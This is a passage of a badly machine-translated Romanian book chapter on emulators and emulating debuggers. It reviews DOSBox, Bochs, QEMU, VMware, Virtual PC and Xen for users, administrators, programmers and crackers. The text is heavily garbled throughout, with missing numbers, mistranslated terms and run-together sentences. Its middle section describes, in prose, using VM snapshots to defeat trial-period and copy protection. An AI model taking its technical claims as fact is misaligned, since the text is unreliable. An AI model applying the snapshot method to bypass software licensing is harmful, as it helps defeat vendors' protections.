procesorului, care,în special, sunt biți din registrul CR , care este invizibil pentru sistemul de operare invitat care operează în altreilea inel Instrucțiunile POPF/POPFD păstrează conținutul înregistrării EFLAGS în memorie fără a genera excepție și,deși o încercare de modificare a câmpurilor privilegiate ale EFLAGS duce la excludere, aceasta nu salvează situația Săpresupunem că un sistem de operare invitat intră în registrul EFLAGS cu o anumită valoare de X, afectând unul sau maimulte câmpuri privilegiate Procesorul generează excepția, emulatorul o interceptează și simulează înregistrarea,„alunecând” sistemul de invitați EFLAGS virtual ” Cu toate acestea, citirea eflag -urilor, nefiind instrucțiuniprivilegiate, își returnează conținutul nemodificat, astfel încât, în loc de valoarea preconizată, sistemul de operareoaspete va primi un sens complet diferit Partea I Revizuirea programelor de hacker cu instrucțiuni LAR, LSL, VERR șiVERW Things sunt și mai rele, deoarece funcționează diferit în moduri privilegiate și nedorite Într -un mod nesănătos,excepția nu este generată, dar instrucțiunea nu revine deloc rezultatul care a fost așteptat de la aceasta Iată doar olistă incompletă de motive care fac ca platforma X să fie nepotrivită pentru o virtualizare eficientă (mai multedespre acest lucru pot fi citite în articolul „Proceedings of the th Usen x Security Symposium”, accesibilhttp://www usenix org/events /Sec /bin Html) Inspirabilitatea arhitecturii X pentru o virtualizare eficientă nuinterzice încă e -mailul software -ului IVMRS cu suport minim din partea echipamentului Într -o aproximarenepoliticoasă, aceasta va fi un interpret, „digerarea” echipelor de mașini cu o imitație ulterioară a implementăriilor Nu există probleme cu procesoarele , dar emularea organizării paginii de memorie și alte funcționalitățicaracteristice celor + procesoare nu numai că complică codificarea, dar reduce și viteza programului de sute sauchiar de mii de ori!Domeniile de utilizare a emulatorilor, în ciuda deficiențelor enumerate în secțiunea anterioară,interesul pentru emulatoare software este în continuă creștere Acest lucru se întâmplă din mai multe motive De exemplu,specialiștii din domeniul securității rețelei ar trebui să aibă la dispoziție cel puțin trei sisteme de operarediferite: cel puțin un sistem din familia Windows NT, una dintre opțiunile Linux, precum și una dintre versiunileFreeBSD;Mai mult, prezența altor sisteme populare de operare este, de asemenea, foarte de dorit Multe vulnerabilități(în special, erori de preaplin) se manifestă doar în versiuni specifice ale sistemelor de operare, în timp ce altesisteme sau chiar alte versiuni ale aceluiași sistem de operare pot fi libere de acest dezavantaj Dar gândiți -vă doarla cât de incomod să reinstalați constant sistemele de operare, abandonând deja familiar și locuit În plus față depierderile colosale de timp (iar timpul se joacă întotdeauna nu în favoarea ta), există și un risc de pierdere a dateloracumulate care este de mare valoare pentru tine!Experimentele cu viruși și exploatări ar trebui, de asemenea, să fieefectuate pe un computer separat, izolat de lumea exterioară, deoarece sistemul de control al accesului încorporat însistemele de operare ale clonelor Windows NT Family și UNIX este departe de a fi perfect Prin urmare, orice neglijențăpermisă de cercetător poate duce la consecințe catastrofale În mod tradițional, aceste probleme au fost rezolvate dincauza Achiziții de mai multe computere sau multe hard disk -uri care au fost conectate alternativ la un computer de test Primasoluție este prea scumpă, iar a doua este extrem de incomodă, mai ales atunci când considerați că hard disk -urile suntextrem de sensibile la un astfel de apel Din acest punct de vedere, este dificil să nu fii de acord cu faptul căemulatoarele într -o astfel de situație sunt mijloace extrem de utile Mai mult, acest capitol nu „face reclamă” niciunemulator separat Dimpotrivă, ea descrie sarcinile care pot fi rezolvate folosind emulatoare și demonstrează zoneleaplicării lor Scopul său principal este de a ajuta cititorii să aleagă emulatoare care sunt cele mai potrivite pentrusoluții practice pentru ei Emule pentru utilizatori își imaginează situația: citiți un articol în revistă despre un noujoc minunat Ai început cu entuziasm să cauți acest joc, l -ai obținut și ai aflat dintr -o dată că nu va funcționa subsistemul tău de operare Ce dezamagire!Utilizatorii FreeBSD în această privință sunt în cea mai proastă situație,deoarece jocurile pentru acest sistem de operare Capitolul Emulare debugger și emulatoare sunt extrem de mici Cum să ieșiți din această situație?Există suficientspațiu liber pe disc pentru instalarea Windows, dar reîncărcați de fiecare dată de îndată ce doriți să jucați - nu,demiteți!Dar dacă acest joc este conceput pentru Mac sau Sony PlayStation?Din fericire, calculatoarele moderne vă permitsă uitați de „fierul autohton”, emulând computerul în ansamblu (Fig ) și deschiderea utilizatorului către lumeanelimitată a software -ului Acum nu sunteți atașat la o platformă hardware specifică și puteți rula orice program,indiferent de computerul pentru care a fost scris - poate fi, de exemplu, ZX Spectrum sau Hyoch Singura problemă este săgăsești un emulator de înaltă calitate Când utilizați emularea, principalul sistem de operare se transformă într -o„fundație”, pe care o puteți construi multe sisteme de operare invitați Una dintre „camerele” din acest „hotel” esterecomandat să fie luat ca „spații de carantină” După cum știți, atunci când instalați orice program nou, există risculde prăbușire a sistemului de operare din cauza unui instalator de lucru incorect, a unui conflict de biblioteci, a unuisoftware rău intenționat sau a unui ghinion obișnuit De aceea, programele obținute din surse nesigure sunt recomandatesă instaleze și să se lanseze într -un mediu izolat Pentru a face acest lucru, puteți evidenția o mașină virtualăseparată în emulator Rețineți, deși acest sfat este bun, trebuie remarcat imediat că nu oferă siguranțăcompletă Modalități de a ieși din mașina virtuală există încă Unele dintre ele vor fi discutate în detaliu în capitolul Fig Un emulator bun vă va permite să lansați orice sistem de operare Partea I Prezentare generală a programelor de hackeri pentruadministratorii pentru administratorii emulatorului - acesta este în primul rând un teren de instruire pentru tot felulde experimente Pune -ți o duzină de clone UNIX diferite și batjocorește -le în întregime Instalați sistemul, demolați -lși instalați -l din nou, corectând ușor configurația La urma urmei, acestea sunt acceptate nu de diplomă, ci despecialitate, iar specialitatea este achiziționată doar în bătălii Același lucru este valabil și pentru restaurareadatelor Fără pregătirea specială a editorului de disc, este mai bine să nu rulați mașina de lucru, iar DISC Doctor esteși mai mult SO Nu există nicio garanție că el va „vindeca” discul și nu îl va transforma în vinetă Pe scurt, unemulator este un suport de testare magnific la care nici nu a trebuit să fie visat înainte (Fig ) Orez Unemulator este un fel de suport de testare care permite, de exemplu, să dobândească abilități pentru a restabili sistemulde fișiere deteriorat în organizații mari, administratorul deține întotdeauna o copie exactă a serverului pe computerulde rezervă și toate patch -urile rulează mai întâi pe el aceasta În organizații mai mici, este aproape imposibil săobțineți o mașină separată special în acest scop, prin urmare, trebuie să recurgeți la un emulator De asemenea, testeazădiverse exploatări și, dacă este confirmat faptul că există o vulnerabilitate, se iau măsuri operaționale pentru a -lelimina Comunicarea unei mașini virtuale cu principalul sistem de operare și alte mașini virtuale este de obiceiefectuată printr -o rețea locală virtuală În prezența de - MB de memorie, puteți crea o adevărată intranetcorporativă cu serverele SQL și web, o zonă demilitarizată, un firewall și mai multe stații de lucru Un exemplu deastfel de rețea virtuală este prezentat în fig Nu puteți veni cu cel mai bun teren de pregătire pentru predareaînțelepciunii rețelei Dacă doriți - atacați, dacă doriți - administrați mai detaliat despre motivele pentru care Acest lucru nu trebuie făcut, descris în următoarea carte: K Kaspersky, „Restaurarea datelor Leadership practic” —P :BHV-Petersburg, Capitolul Emularea debuggerilor și a emulatorilor de emulatori pentru programatori sunt ceimai iubiți de emulatori Nucleul sistemului de operare nu iertă erorile și distruge în mod vindictiv hard disk -ul,distrugând toate datele acumulate de -a lungul mai multor ani Reîncărcarea și înghețarea este, în general, un lucruobișnuit, pe care îl obișnuiești să -ți placă o lovitură de roți sau un șters de anvelope În plus, majoritatea ecranelornivelului nuclear necesită prezența a două computere conectate printr-o rețea locală sau o rețea locală Pentru undezvoltator profesionist, acesta nu este un lux, ci unde să le punem?Totul este mult mai ușor cu emulatorul Nicipierderea de date, fără reporniri și toate lucrările la depanare nu se pot face pe un computer Desigur, problema nu seîntâmplă fără reporniri, dar, în timp ce mașina virtuală este repornită, puteți face ceva util pentru cea principală (deexemplu, conduceți codul sursă al șoferului) În plus, putem face ca emulatorul să scrie comenzi în fișierul revistei,analizând care puteți determina motivul defecțiunii șoferului (deși nu toate emulatoarele oferă o astfel deoportunitate) În nucleul standard nu există niciun debugger FreeBSD, iar nucleul de depanare aduce efecte secundare lasistem Prin urmare, în nucleul de depanare, șoferul poate funcționa normal, dar determină prăbușirea sistemului în celstandard Debigerii Windows se comportă într -un mod similar, astfel încât testarea finală a driverului ar trebui să aibăloc într -o configurație standard, unde dezvoltatorul este lipsit de toate mijloacele de depanare și monitorizare Înceea ce privește programatorii aplicați, emulatoarele le permit să păstreze întreaga linie de sisteme de operare laîndemână, ajustând programele dezvoltate la caracteristicile comportamentului fiecăruia dintre ele În lumea Windows,există doar două familii de sisteme de operare - Windows X și linia Windows NT și chiar în aceste condiții,dezvoltatorii au adesea un cap într -un cerc, dar lumea Unix Mult mai divers!Insidiozitatea bug -urilor este că acesteatind să apară doar în configurații strict definite Instalarea software-ului suplimentar și, cu atât mai mult, reglareaîncrucișată a nucleului le poate înspăimânta și apoi poate căuta armele Și asta înseamnă că până la găsirea erorii,nimic nu poate fi schimbat în sistem Pe mașina principală, această cerință este dificil de îndeplinit, dar în emulatoracest lucru nu provoacă probleme Mașina virtuală, deconectată din rețea (inclusiv virtuală) nu are nevoie de patch-uri Dar cum să schimbați date?La serviciul dvs se află discheta și CD-R Partea I Revizuirea programelor de hackerieste cel mai important avantaj al emulatorilor este acela că acestea vă permit să creați „distribuții” astfel -numite -„Imagini instantanee” ale sistemului sistemului (instantanee de sistem) și reveniți la ele la acestea de fiecare datăcând este un număr nelimitat de ori Acest lucru simplifică foarte mult sarcina de a reproduce eșecul (adică,determinarea circumstanțelor apariției sale) Cum este o astfel de distribuție diferită de o memorie de dump aruncată desistem în timpul unui eșec?După cum urmează din numele său, groapa conține doar informații care erau în memoriasistemului în momentul eșecului, iar „distribuția” - toate componentele sistemului, inclusiv conținutul discului,memoria, controlerele etc Aplicații de rețea de la emulatoare, în general, în deplină încântare Anterior, dupădepanarea unor astfel de aplicații, a fost nevoie de un al doilea computer și a fost destul de dificil de făcut fără unasistent, care anterior a fost obligat să se antreneze Acum, depanarea aplicațiilor de rețea a fost simplificată lalimită (Fig ) Orez Debugarea programului aplicat în cadrul emulatorilor emulator pentru hackerii care emuleazădebuggerii a apărut în timpul MS-DOS și a câștigat imediat popularitate frenetică în rândul hackerilor Nesurprinzător!Laurma urmei, mecanismele de protecție obișnuite folosesc două metode principale pentru a combate depanatorul - detectareapasivă a depanului și confiscarea activă a resurselor de depanare care fac imposibilă depanarea În ceea ce priveștedebuggerul emulat, aceste GPAV -uri Emularea depanggurilor și emulatoare nu ​​suntdistribuite în niciun fel - se află sub procesorul virtual și, prin urmare, este complet invizibil pentru aplicareadebugată În plus, emularea debuggerilor nu folosesc resurse ale procesorului emulat Distribuțiile sistemului ajută la omulțime de programe de utilizare cu o perioadă limitată de utilizare Punem programul, creăm o distribuție, traducemdata, după care facem o altă distribuție Ne uităm - ce s -a schimbat Tragem concluzii și „despart” din program piese deschimb suplimentare Cea mai simplă și publică versiune a acestei tehnici arată astfel: instalăm un program protejat pe omașină virtuală separată Facem „distribuție” Toata lumea!Protecția s -a încheiat!Oricât de mult începem „distribuția”,protecția va crede naiv că este lansată în primul o singura data Nu va putea fi atașat de echipament, deoarece echipamentul emulatorului nu depinde de mediul hardware Peparcurs, emulatorul eliberează din nevoia de a pune un program rupt pe mașina principală În primul rând, unele programe,după ce au descoperit că sunt rupte, încearcă să contracareze acest lucru De exemplu, un astfel de program poate ștergedatele de pe un hard disk În orice caz, chiar dacă protecția nu vă ajustează niciun truc murdar, programul va funcționaprobabil instabil Lasă -l mai bine buggy pe un emulator!Din fericire, virtualizarea hardware, problema performanțeiscăzute a emulatorilor, menționată la începutul acestui capitol, a devenit deja un lucru al trecutului La mijlocul- , trecerea pe piața serverelor puternice, Intel și AMD au dezvoltat tehnologii de virtualizare hardware De fapt, auadăugat un inel de protecție suplimentar, care lucrează în care Hypervisor poate intercepta toate evenimentele carenecesită atenție din partea sa În termeni practice, acest lucru a redus semnificativ costurile generale aleemulatorului, iar acum performanța mașinilor virtuale atinge aproximativ - % din performanța procesoruluiprincipal Tehnologia virtualizării hardware este deja acceptată de noile versiuni ale emulatoarelor De exemplu, unastfel de suport este furnizat de VMware Emulators, HP, precum și de o serie de alte produse care vor fi luate înconsiderare în continuare în acest capitol Deci, de ce aveți nevoie pentru experimente cu emulatoare?Dacă problemaproductivității scăzute nu vă deranjează, atunci cerințele hardware vor fi destul de modeste De exemplu, pentru a oferio muncă confortabilă cu Windows și FreeBSD , procesorul Pentium III -MHz este suficient Acest lucru vă vapermite să jucați, de exemplu, în Quake I, deși la limită Cerințele pentru RAM vor fi puțin mai stricte De regulă,principalul sistem de operare trebuie lăsat, cel puțin MB de RAM și pentru fiecare mașină virtuală (adică, fiecaresistem de operare invitat) pentru a aloca aproximativ - MB Desigur, volumul memoriei necesare depinde de tipul desistem de operare emis De exemplu, MB vor fi suficiente pentru emularea MS-DOS După ce ați evidențiat MB cu omașină virtuală, puteți imita Windows /XP/ Prezența unui spațiu cu disc liber nu este de obicei o problemă deimportanță primordială Mașinile virtuale nu sunt create pentru acumularea și stocarea datelor Cu excepții rare, acesteanu conțin altceva decât o copie tipică a sistemului de operare emulat și minimul necesar de aplicații Imaginea disculuivirtual este stocată într -un fișier obișnuit, care este sub controlul complet al sistemului principal deoperare Virtual Discs Hypervisor (Hypervisor) -A Program (sau schemă hardware), care permite efectuarea simultană șisimultană a unuia gazdă-computer mai multe sisteme de operare Termenul „Hipervizor” este introdus în mod specific pentrua sublinia diferența de termenul „supraveghetor” ( supraveghetor), care a fost numit în mod tradițional managerulresurselor nucleului din epoca lui Maynframers Partea /, o revizuire a programelor de hacker Există două tipuri -fixate (fixate) și dinamice sau „SPARSE” (rafinate), astfel -numite Când creați un disc virtual fix, emulatorul„distribuie” imediat fișierul de imagine în spațiul discului selectat, chiar dacă imaginea nu conține informațiiutile Atunci când creați un disc virtual dinamic, dimpotrivă, doar sectoarele virtuale utilizate sunt păstrate înfișierul de imagine, iar dimensiunea imaginii crește pe măsură ce este completată cu date Dacă performanța emulatoruluieste importantă pentru dvs , atunci situația este diferită Pentru a utiliza avantajele virtualizării hardware, trebuiesă aveți la dispoziție pentru a avea un procesor care să ofere suport pentru această tehnologie Următoarele procesoareIntel sunt potrivite în acest scop: Pentium x , Pentium D xx, Xeon XXX, Core Duo și Soga Duo (VanderpoolTechnology) și Itanium (Silvervale Technology) În ceea ce privește procesoarele AMD, toate procesoarele realizate maitârziu în mai (socket AM , Socket S și Socket F -Thlon , Turion ), precum și toate procesoarele AMD Opteron,emise mai târziu de august (Pacifica Technology) Oficial, tehnologiile de virtualizare hardware implementate deIntel și AMD sunt numite ѵT-X și, respectiv, AMD-V Desigur, pe lângă procesor, veți avea nevoie de o placă de bazămodernă și, eventual, de o versiune actualizată a BIOS Unele BIOS vă permit să porniți și să dezactivați suportulvirtualizării hardware, iar în unele dintre ele este dezactivat implicit OK, fierul este cumpărat, colectat, configuratși gata de funcționare: acum rândul este pentru software O revizuire a emulatoarelor populare dintre toate emulatoareledisponibile sunt cele mai populare DOSBOX, Bochs, Microsoft RS virtual și VMware Fiecare dintre ele are propriile avantaje, dezavantaje și, desigur, fiecare dintre ele are propriulcerc de fani Emulator gratuit DOSBOX răspândit în textele sursă (http://dosbox sourceforge net/ download php? Main =l) Emulează singurul sistem de operare-MS-DOS Este folosit în principal pentru a lansa jocuri vechi Roțile dure nusunt emulate (emulația de intrare a discului și de ieșire se termină la întreruperea YT H), iar softice nufuncționează pe ea Dar Sir (unpacker de fișiere executabile plus depanger), care poate fi descărcat laftp://ftp elf stuba sk/pub/pack/pack/ucfcup zip, funcționează destul de regulat (Fig ) În plus, există un debuggerintegrat bun (deși pentru aceasta, emulatorul ar trebui să fie completat cu tastele de depanare) Posibilitateaexpansiunii nu este furnizată în mod constructiv Cu toate acestea, disponibilitatea textelor sursă bine structurate faceca această problemă să fie irelevantă Dacă doriți, puteți adăuga orice oportunitate funcțională lipsă în orice moment(de exemplu, un hard disk virtual) Trei moduri de emulare sunt acceptate - complete, parțiale șidinamice Completitudinea emulării „complete” este de fapt destul de arbitrară De exemplu, depanatorul lui Softice nufuncționează în acest emulator Cu toate acestea, pentru marea majoritate a programelor inexplicabile, cu emulareparțială mai mult decât suficientă Ambele moduri sunt destul de fiabile și este nerealist să ieșiți din emulator, deșiperformanța mașinii murdare lasă mult de dorit - Pentium SH MHz scade la , MHz, încetinind de mai mult de deori Modulul de emulare dinamică (efectuarea codului pe procesorul „viu”) este încă în curs de dezvoltare, iar versiuneacurentă conține multe erori, unele dintre ele sunt fatale Din acest motiv, utilizarea acestui modul nu este recomandată,în ciuda faptului că performanța sa este de patru ori mai mare Capitolul Emularea debuggerilor și emulatorilor Shi , □!X |ICONFIG: Încărcarea setărilor dinfișierul de configurare dosbox conf Riidi Îpeneed Deuice: Win Fig Debuggerul Cup , lansat de emulatorul DOSBOX(direct de la Windows Cup ș nu este lansat), schimbul de date cu lumea exterioară are loc fie prin acces direct la CD-ROM, fie prin cataloagele discului fizic până la discuri logice virtuale disponibile de la emulator prin emulator prininterfața int H Aceasta oferă o protecție destul de fiabilă împotriva programelor dăunătoare Vor putea distrugecatalogul montat, dar toate celelalte - nu!DOSBOX este potrivit pentru experimentele cu majoritatea virușilor MS-DOS(excluzând, poate, doar cele care trebuie întrerupte de INT sau porturi de intrare/ieșire), precum și pentruprogramele de hacking care funcționează atât în ​​moduri reale, cât și protejate Bochs și Qemu Bochs sunt un emulator cuadevărat hacker axat pe profesioniști (Fig ) Morții simpli consideră că este prea confuz și impasibil Aici totuleste configurat prin fișiere de configurare a textului - de la numărul de procesoare la geometria disculuivirtual Acesta este un produs non -profit, cu texte open source și o calitate impresionantă de emulare Controlereleflexibile și hard disk -ul IDE sunt emulate la nivelul porturilor de intrare/ieșire, oferind compatibilitate cu aproapetoate programele cu nivel scăzut Modul procesor protejat este complet emulat În orice caz, Softice începe cu succes(Fig ), deși funcționează oarecum instabil, atârnând periodic tastatura virtuală Există un debugger integrat destulde decent, cu un număr nelimitat de funcții virtuale ale funcțiilor de oprire și de urmărire inversă Emulatorul estepotrivit pentru studiul virușilor și depanarea programelor pervertite care lucrează în modul MS-DOS sau Linux/FreeBSD,precum și pentru experimente cu diverse sisteme de fișiere (vezi Fig ) Versiunea completă a codului sursă estesituată la http://bochs sourcefbrge net Aici puteți găsi, de asemenea, fișiere pregătite pentru Windows și Linux Dinpăcate, pentru a rula Windows în acest emulator, va fi necesar un procesor modern puternic și, chiar și în acestcaz, performanța va fi dezamăgitor de scăzută Partea I Revizuirea programelor de hacker Time C: NRET TIMER nu a fostgăsit, calendarul precis inevilabil TIME C: Utilizarea cronometrului PIT MHz TIME C: detectat procesor , MHz Consola: Color UGA + x Bucla de întârziere de calibrare ® Bogomips Mtrmory: K/ K Disponibil (codde kernel K, K rezervat, k date, ■■ • OK INIT) PENTRY CACHE HASH TABEL TABEL: (ordine: (Ordine: , octeți) Intrări de tabel cu tampon-cache: (comandă: , octeți) TAGE-CACHE HASH Intrări: (Comandă: , octeți) CPU: Li I Cache ( Bytes/ Linie/o mod), d cache ok ( octeți/linie/o mod) CPU: L Cache:OK ( octeți/linie/o mod) CPU: DTLB Li aproximativ K MB L : O K MB CPU: TLB Li о K MB L : о K MB F SIXTESTAREA CONFORMANȚEI DE UNIFIX RNABLED EXTIHT PE CPUSO ESB Valoare Înainte de a activa vectorul: ESB ValoareDupă activarea vectorului: Testarea HMI WatchDog CPUSO: MMI pare să fie stuc!Folosind întrerupereacronometrului APIC local A utilizat MHz Timer APIC CPU: , ceasuri: , felie: fig Bochs vă permite să rulațiversiunea pe de biți a Linux Debian pe Procesorul X Fig Debuggerul lansat în sesiunea MS-DOS sub controlulfuncționării emulatorului Bochs, bazată pe Bochs, creează un alt emulator minunat-Qemu, folosind modul de emularedinamică, care crește productivitatea de zece ori Fără a intra în detalii tehnice, observăm că QEMU, așa cum era,„compilează” codul mașinii, care, atunci când se repetă, funcționează pe o glandă „vie” la viteză maximă În cicluri,acest lucru oferă o victorie extraordinară!Adevărat, performanța generală lasă în continuare mult de dorit șistabilitate (datorită dificultăților tehnice ale implementării emulării dinamice) Unele programe nu încep deloc (înspecial jocurile), altele zboară periodic Cu toate acestea, Qemu trage cu ușurință Linux/BSD fără o coajă grafică, iarrândurile fanilor săi cresc constant O versiune proaspătă poate fi întotdeauna descărcată gratuit de pehttp://fabrice bellard ftee fr/qemu GPAVA Emularea debugerilor și emulatorilor VMware, după ce și -a dat seama de perspectivele pieței de emulatoare deînaltă calitate, în , VMware a lansat un produs revoluționar numit VMware Virtual Platform Acesta a fost implementatpe baza studiilor efectuate la Universitatea Stanford și brevetat în mai Brevetul în sine, precum și toateinformațiile tehnice necesare sunt disponibile pentru descărcare gratuită la http://patft uspto gov/netacgi/nph-parser patentnumbers Pentru a obține o rată ridicată de emulare pe procesoarele de arhitectură x ,dezvoltatorii VMware au folosit o serie de tehnologii complexe care necesită o interacțiune strânsă cu nucleulsistemului de operare principal Din păcate, toate acestea impun restricții semnificative asupra sistemelor de operareinvitați Virtualizarea completă nu a putut fi realizată Doar câteva funcționalități ale procesoarelor x emulează, întimp ce încercările de a profita de restul duc la un comportament imprevizibil al sistemului de operare invitat Cu toateacestea, o scădere a performanței nu este prea semnificativă, ceea ce vă permite să lucrați cu succes cu sistemulWindows la procesorul Pentium III Astfel, VMware -ul poate fi caracterizat ca un emulator multi -scop potrivitpentru o varietate de experimente, mai ales dacă aveți un computer puternic și modern (Fig ) Orez Windows Vista,lansat în emulatorul VMware sub Windows XP, un avantaj incontestabil al VMware este lucrarea stabilă a SoftLCE (Fig ), precum și suport pentru imagini instantanee ale sistemului Partea I Revizuirea programelor de hackerFig Softice lucrează constant cu VMware cum să configurați Softice sub VMware atunci când încercați să utilizațiSoftice sub Windows , lansat de la VMware, puteți întâmpina probleme Esența problemei este că Softice funcționeazădoar dintr -un mod de text cu ecran complet (mergem la Far Manager, faceți clic pe + , apoi + ), iarîn toate celelalte moduri atârnă strâns sistemul Dar sub Windows , se simte destul de normal, dar trecerea la Windows nu este o opțiune Aceasta este o eroare de implementare bine cunoscută recunoscută de Numega și eliminată doar înversiunea Divertudio (în formularea oficială a acestui lucru se numește „Suport pentru VMware”) Detalii pot figăsite în documentația însoțitoare (vezi \ compuware \ divertudio \ Books \ folosind softlce pdf, apendicele e -"softice și vmware") În același timp, este necesar să adăugați linii svga maxfullscreenrefreshtick = " " și vininouse present = "false" la fișierul de configurare al mașinii virtuale (name virtual th) /Discuri laser Sunt implementatefoldere separate cu protecție decentă Notă pentru a crește viruși în intestinele mașinii virtuale ar trebui să fieavertizate cu precauție, deoarece „cochilie” care separă sistemul oaspeților de lumea reală este prea subțire Desigur,puteți porni emulatorul în emulator (de exemplu ,,, De exemplu, (de exemplu, de exemplu, Bochs în interiorul VMware),doar acest lucru nu va rezolva încă toate problemele, ci performanța Va cădea enorm!Începând cu versiunea , VMware acceptă tehnologia de virtualizare hardware Vanderpool, care îi permitesă lanseze sisteme de operare invitați pe de biți pe procesoare X Adevărat, pentru sistemele de operare oaspete pe de biți, virtualizarea hardware este dezactivată în mod implicit, deoarece datorită deficiențelor implementării înloc de accelerația promisă, oferă GPAS Emularea depangurilor și emulatoare încetinește O explicație detaliată a cauzelor acestui comportament al emulatorului poate fi găsită în articolul „Ocomparație a tehnicilor de software și hardware pentru virtualizarea x ”, scrisă de două VMware Adams) și Olom Agesen(Ole Agesen) și site -ul companiei (htttp ) /www vmware com/pdf/asplos adanis pdf) Notă pentru a forța VMware săutilizeze virtualizarea hardware în ordinea forțată va ajuta linia monitor control vt = "true" linia adăugată la * Setx fișier al mașinii virtuale corespunzătoare Adevărat, acest lucru nu va aduce prea multe beneficii Cea mai recentăversiune a VMware poate fi descărcată de pe site -ul companiei http://www vmware com În plus față de versiunilecomerciale, VMware este furnizat și de emulatoare gratuite: VMware Riaug și VMware Server, care poate fi descărcat de pepagina http://www vmware com/products/ Free virtualization html- În ciuda tuturor avantajelor evidente ale VMware ,acest emulator nu este o caracteristică neplăcută și nu folosește toate celelalte produse de virtualizare inutile Acestlucru este valabil mai ales în raport cu emulatoarele cu debuggeri construiți și furnizați cu codurile sursă, ceea ceface posibilă extinderea nelimitată a funcționalității lor Microsoft Virtual RS este un emulator bun care se răspândeștefără texte inițiale, dar oferind o viteză decentă de emulare care transformă Pentium SH MHz în Pentium Shu MHz(modul de emulare dinamică oferă suport pentru toți inginerii procesorului fizic) AMI BIOS (cu posibilitatea deconfigurare prin configurare (Fig ), cipuri Intel VC, placă de sunet a creativului Sound Blaster ISA, Adapterde rețea Dec A / și S Trio / PCI C MB de memoria pentru memoria MB este complet emulată În general,această configurație vă permite să lansați sistemele de operare moderne ale familiei Windows NT, precum și FreeBSD cumembrane grafice Există posibilitatea accesului direct la discuri și unități flexibile -R m Hard disk-urile suntemulate la nivelul controlerului IDE cu două canale (a se vedea documentația pentru Chipset VX), plasată pe un harddisk sub forma unui fișier dinamic sau cu imagini fixe Dacă doriți, puteți interacționa cu Sistemul principal deoperare și alte mașini virtuale prin foldere separate sau rețea locală virtuală Ambele metode sunt nesigure și, prinurmare, în studiul programelor agresive, este mai bine să nu recurgeți la ele Virtual RS folosește metoda devirtualizare, similară cu utilizarea utilizatăOvan în vmware Cu toate acestea, VMware oferă o mai bună calitate aemulinării și un suport mai larg al hardware -ului În special, debuggerul softice, care lucrează perfect pentru VMware,refuză să lucreze sub RS virtual (Fig ) De asemenea, nu există niciun debugger construit și oportunități de a lucracu imagini instantanee ale stării mașinii virtuale Toate aceste dezavantaje limitează semnificativ domeniul de aplicareal acestui emulator Cu toate acestea, jocurile care nu necesită un procesor rapid și un adaptor video puternic sub RSvirtual funcționează mai bine decât sub VMware În cele din urmă, nu se poate bucura de faptul că în iulie ,Microsoft Corporation s -a îndreptat în sfârșit către dorințele utilizatorilor și a lansat o versiune gratuită a virtualRS , care poate fi descărcată la http://www microsoft com/windows/ Virtualpc Descărcări /spl mspx Acest produsgratuit poate fi recomandat pentru experimentele cu sisteme de fișiere, ceea ce va ajuta la dobândirea abilitățilorpractice în restabilirea datelor pierdute g^l microsoftw „-| Windows Ex - |Coreidrawlls |țy Fig BMPG VirtualPC -|^I "■ ' * : fig Microsoft Virtual RS emulează întregul computer, inclusiv BIOS Configurarea MS-DOS O eroare de procesor nereconab a fost întâlnită Mașina virtuală se va reseta acum ; Resef Fig Reacția MicrosoftVirtual RS la o încercare de a lansa Softice apare adesea o întrebare destul de delicată despre nevoia de ferestreautorizate (și alte software) pentru fiecare mașină virtuală pe care este instalată Din punct de vedere legal, totuleste în regulă, deoarece sistemele de operare sunt încă autorizate pentru mașini fizice, ceea ce este destul de logic,dar protecția vagă încorporată în Windows necesită activare atunci când schimbați toate cele trei componente cheie -procesor, hard disk și placă video, și pe virtual sunt în mod natural virtual și deloc coincide cu real Adevărat, VMware, care efectuează comanda CPUID, arată procesorul așa cum este, salvându -ne de nevoia de a plătipentru aceeași copie a Windows de multe ori la rând Noile versiuni ale software -ului de virtualizare Microsoft acceptătehnologii de virtualizare hardware De exemplu, Microsoft Virtual Server acceptă tehnologiile Pacifica șiVanderpool Capitolul Emularea depangurilor și emulatoarelor HEP Project Xen - creierul organizației non -profit acomunității KHP, condusă de Jan Pratt de la Xensource, Inc (Fig ) - a apărut cu mult înainte de „invenția”virtualizării hardware Acesta a fost utilizat pe scară largă de companii precum VM și Hewlett-Packard în Maynframerspentru a organiza servere virtuale evidențiate (servere dedicate virtuale), despre care se pot citi mai multe desprearticolul http://en wikipedia org/virtual delintedicat server Aceasta, desigur, indică fiabilitatea ridicată șicalitatea excelentă a acestui produs Este testat în timp și, care este și mai important, pe lângă platforma X , acceptăși platforme precum X - , IA , PPS și SPARC Orez Sistemele de operare invitate din emulatorul Hep suntadevărate, pe procesoare care nu acceptă virtualizarea hardware, o modificare a nucleului sistemului de operare invitatcare interacționează cu hipervizorul este necesară prin setul de funcții ARI furnizate de acesta În acest sens, nuexistă probleme cu sistemele de operare deschise (XBSD, Linux), dar Windows XP a fost transferat exclusiv la Xen caparte a proiectului de program de licențiere academic al Microsoft, care permite Windows Core în scopuri academice Înciuda faptului că transferul a fost efectuat odată cu participarea activă a Microsoft Research în strânsă cooperare cuSistemele de operare a Universității din Cambridge, condițiile acordului de licență nu permit versiunea portată aWindows XP în nicio condiție Cu toate acestea, detaliile tehnice ale transferului sunt descrise în detaliu îndocumentația de pe Xen, astfel încât cu o dorință arzătoare înmulțită cu un exces de timp liber, orice grup de hackeripoate repeta acest focus Partea I Revizuirea programelor de hacker- Cu suportul virtualizării hardware de cătreprocesor, Xen vă permite să lansați sisteme de oaspeți fără nicio modificare (iar Xen acceptă toate cele trei tehnologiide virtualizare: Pacifica, Vanderpool și Silvervale) De ce să fie limitat doar la Windows-GR, atunci când există WindowsVista, Server Longhorn și iubite de multe Windows Linux, NetBSD sau FreeBSD pot acționa ca un sistem de operare debază (acesta din urmă este menținut în modul limitat) Xen face parte din multe distribuții, inclusiv Debian Existăversiuni comerciale ale lui Xen, de exemplu, Novell Sles sau Red Hat Rhel În ceea ce privește Windows, acesta nu esteinclus în lista sistemelor de operare de bază acceptate de Xen Prin urmare, dacă alegeți acest emulator special, atuncitrebuie să instalați Linux/NetBSD De fapt, nu este nimic în neregulă cu acest lucru, dar atunci va fi posibil să lansămmulte ferestre de oaspeți deasupra tuturor versiunilor care vor fi pe placul O altă opțiune este să utilizați imaginiLiveCD care sunt disponibile pentru descărcare gratuită la http: //www xensource coin/download/dl cd html Codurileinițiale KEP sunt disponibile aici: http://www kl cam ac uk/research/srg/netos/xen Cei mai apropiați concurenți, așa căați fost convins că virtualizarea este o tehnologie avansată care vă permite să experimentați cu toate sistemele deoperare existente, să organizați rețele virtuale, precum și să simulați atacuri, în timp ce observați reacția firewall-urilor și a sistemelor de invazie, ID -urilor, ID -urilor) Prin urmare, nu este surprinzător faptul că produsele 